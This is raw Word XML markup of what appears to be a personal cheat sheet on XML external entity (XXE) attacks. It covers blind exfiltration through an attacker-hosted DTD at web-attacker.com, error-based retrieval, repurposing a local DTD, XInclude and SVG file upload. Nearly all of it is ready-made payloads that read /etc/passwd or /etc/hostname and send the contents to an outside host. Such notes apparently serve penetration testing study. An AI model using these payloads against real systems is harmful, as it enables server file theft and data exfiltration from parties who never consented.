      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>On exploit server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77461483" w14:textId="30B979CD" w:rsidR="00406512" w:rsidRPr="00406512" w:rsidRDefault="00406512" w:rsidP="00406512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40651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&lt;!ENTITY % file SYSTEM "</w:t>
      </w:r>
      <w:r w:rsidRPr="00406512">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>file:///etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="0040651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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568DDD53" w14:textId="77777777" w:rsidR="00406512" w:rsidRPr="00406512" w:rsidRDefault="00406512" w:rsidP="00406512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40651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&lt;!ENTITY % eval "&lt;!ENTITY &amp;#x25; exfiltrate SYSTEM '</w:t>
      </w:r>
      <w:r w:rsidRPr="00406512">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>http://web-attacker.com</w:t>
      </w:r>
      <w:r w:rsidRPr="0040651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/?x=%file;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B709D2F" w14:textId="77777777" w:rsidR="00406512" w:rsidRPr="00406512" w:rsidRDefault="00406512" w:rsidP="00406512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40651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%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0040651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eval;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4822BEEC" w14:textId="4A4ADA5B" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00406512" w:rsidP="00406512">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr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%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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exfiltrate;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2F9D3F3B" w14:textId="3E8F85E3" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23102BEF" w14:textId="66B583FD" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00924D7D" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0D73C5" w14:textId="5F42E8E7" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00924D7D" w:rsidP="00A40A64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924D7D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&lt;!DOCTYPE foo [&lt;!ENTITY % xxe SYSTEM</w:t>
      </w:r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</w:t>
      </w:r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"</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>http://web-attacker.com/malicious.dtd</w:t>
      </w:r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"&gt; %xxe;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EDDF14" w14:textId="77777777" w:rsidR="00184525" w:rsidRPr="00152206" w:rsidRDefault="00184525" w:rsidP="00A40A64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</w:p>
    <w:p w14:paraId="5792B763" w14:textId="77777777" w:rsidR="00184525" w:rsidRPr="00152206" w:rsidRDefault="00184525" w:rsidP="00184525">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Exploiting blind XXE to retrieve data via error messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A749252" w14:textId="228422C2" w:rsidR="00184525" w:rsidRPr="00152206" w:rsidRDefault="00184525" w:rsidP="00184525">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>On exploit server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBACC73" w14:textId="54227F25" w:rsidR="00184525" w:rsidRPr="00184525" w:rsidRDefault="00184525" w:rsidP="00184525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184525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&lt;!ENTITY % file SYSTEM "</w:t>
      </w:r>
      <w:r w:rsidRPr="00184525">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>file:///etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00184525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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484262C5" w14:textId="77777777" w:rsidR="00184525" w:rsidRPr="00184525" w:rsidRDefault="00184525" w:rsidP="00184525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184525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&lt;!ENTITY % eval "&lt;!ENTITY &amp;#x25; error SYSTEM 'file:///nonexistent/%file;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D3F74F" w14:textId="77777777" w:rsidR="00184525" w:rsidRPr="00184525" w:rsidRDefault="00184525" w:rsidP="00184525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184525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%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00184525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eval;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="57B73FFC" w14:textId="1FC36014" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00184525" w:rsidP="00184525">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr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%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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error;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2D353957" w14:textId="6DE58676" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C106F04" w14:textId="77777777" w:rsidR="00184525" w:rsidRPr="00152206" w:rsidRDefault="00184525" w:rsidP="00184525">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7FBC2D" w14:textId="2B93BB5C" w:rsidR="00184525" w:rsidRPr="00152206" w:rsidRDefault="00184525" w:rsidP="00184525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924D7D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&lt;!DOCTYPE foo [&lt;!ENTITY % xxe SYSTEM</w:t>
      </w:r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"</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>http://web-attacker.com/malicious.dtd</w:t>
      </w:r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"&gt; %xxe;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D87916F" w14:textId="77777777" w:rsidR="0029367B" w:rsidRPr="00152206" w:rsidRDefault="0029367B" w:rsidP="00184525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</w:p>
    <w:p w14:paraId="0CB8E0C6" w14:textId="77777777" w:rsidR="0029367B" w:rsidRPr="00152206" w:rsidRDefault="0029367B" w:rsidP="0029367B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Exploiting blind XXE by repurposing a local DTD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19643E20" w14:textId="6C165160" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="0029367B" w:rsidP="00A40A64">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>suppose there is a DTD file on the server filesystem at the location </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206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/usr/local/app/schema.dtd</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, and this DTD file defines an entity called </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206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custom_entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3CBA20" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00152206" w:rsidRDefault="00EF7844" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51FB64C9" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00EF7844" w:rsidRDefault="00EF7844" w:rsidP="00EF7844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F7844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&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34564FC8" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00EF7844" w:rsidRDefault="00EF7844" w:rsidP="00EF7844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F7844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&lt;!ENTITY % local_dtd SYSTEM "file://</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7844">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>/usr/local/app/schema.dtd</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7844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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3F808C" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00EF7844" w:rsidRDefault="00EF7844" w:rsidP="00EF7844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F7844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&lt;!ENTITY % </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7844">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">custom_entity </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7844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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15337359" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00EF7844" w:rsidRDefault="00EF7844" w:rsidP="00EF7844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F7844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&lt;!ENTITY &amp;#x25; file SYSTEM "file:///</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7844">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7844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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DCD3CD" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00EF7844" w:rsidRDefault="00EF7844" w:rsidP="00EF7844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F7844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&lt;!ENTITY &amp;#x25; eval "&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file:///nonexistent/&amp;#x25;file;&amp;#x27;&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB661B3" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00EF7844" w:rsidRDefault="00EF7844" w:rsidP="00EF7844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F7844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&amp;#x25;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF7844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eval;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="52CEDE2D" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00EF7844" w:rsidRDefault="00EF7844" w:rsidP="00EF7844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F7844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&amp;#x25;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF7844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error;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="652E4F7E" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00EF7844" w:rsidRDefault="00EF7844" w:rsidP="00EF7844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F7844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'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAC8B3C" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00EF7844" w:rsidRDefault="00EF7844" w:rsidP="00EF7844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F7844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%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF7844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local</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF7844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_dtd;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4132D4E8" w14:textId="42665D4E" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00EF7844" w:rsidP="00EF7844">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr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]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D13B567" w14:textId="2823150C" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="495C0109" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00152206" w:rsidRDefault="00EF7844" w:rsidP="00EF7844">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Locating an existing DTD file to repurpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F446609" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00EF7844" w:rsidRDefault="00EF7844" w:rsidP="00EF7844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F7844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&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0B752E" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00EF7844" w:rsidRDefault="00EF7844" w:rsidP="00EF7844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F7844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&lt;!ENTITY % local_dtd SYSTEM "file:///</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7844">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>usr/share/yelp/dtd/docbookx.dtd</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7844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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189B671D" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00EF7844" w:rsidRDefault="00EF7844" w:rsidP="00EF7844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F7844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%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF7844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local</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF7844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_dtd;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EB4519" w14:textId="1CCF91B0" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00EF7844" w:rsidP="00EF7844">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr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]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547985FA" w14:textId="0874EA09" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00EF7844" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>causes error if the file is missing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C576601" w14:textId="7FF101D6" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DAA5108" w14:textId="03B2126B" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00EF7844" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF7844">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>/usr/share/yelp/dtd/docbookx.dtd</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">custome_entity = </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>ISOamso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61793470" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00152206" w:rsidRDefault="00EF7844" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A28EB6E" w14:textId="77777777" w:rsidR="00EF7844" w:rsidRPr="00152206" w:rsidRDefault="00EF7844" w:rsidP="00EF7844">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>XInclude attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAF7BCA" w14:textId="60918CBD" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="009D1F1B" w:rsidP="009D1F1B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9D1F1B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&lt;foo xmlns:xi="http://www.w3.org/2001/XInclude"&gt;</w:t>
      </w:r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&lt;xi:include parse="text" href="file:///etc/passwd"/&gt;&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD1177C" w14:textId="77777777" w:rsidR="009D1F1B" w:rsidRPr="00152206" w:rsidRDefault="009D1F1B" w:rsidP="009D1F1B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</w:p>
    <w:p w14:paraId="56359492" w14:textId="77777777" w:rsidR="009D1F1B" w:rsidRPr="00152206" w:rsidRDefault="009D1F1B" w:rsidP="009D1F1B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>XXE attacks via file upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1169F203" w14:textId="03C73403" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="009D1F1B" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>create a svg image with the following content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C230E77" w14:textId="77777777" w:rsidR="009D1F1B" w:rsidRPr="00152206" w:rsidRDefault="009D1F1B" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="537AA6F4" w14:textId="610E9CB0" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="009D1F1B" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" standalone="yes"?&gt;&lt;!DOCTYPE test [ &lt;!ENTITY xxe SYSTEM "</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>file:///etc/hostname</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>" &gt; ]&gt;&lt;svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"&gt;&lt;text font-size="16" x="0" y="16"&gt;&amp;xxe;&lt;/text&gt;&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427E25CE" w14:textId="7C7D2FD1" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A058EA" w14:textId="1F575AB0" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="009D1F1B" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>The content of the file is in the image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1136E49C" w14:textId="01ECEC33" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A2A3FD" w14:textId="77777777" w:rsidR="00152206" w:rsidRPr="00152206" w:rsidRDefault="00152206" w:rsidP="00152206">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
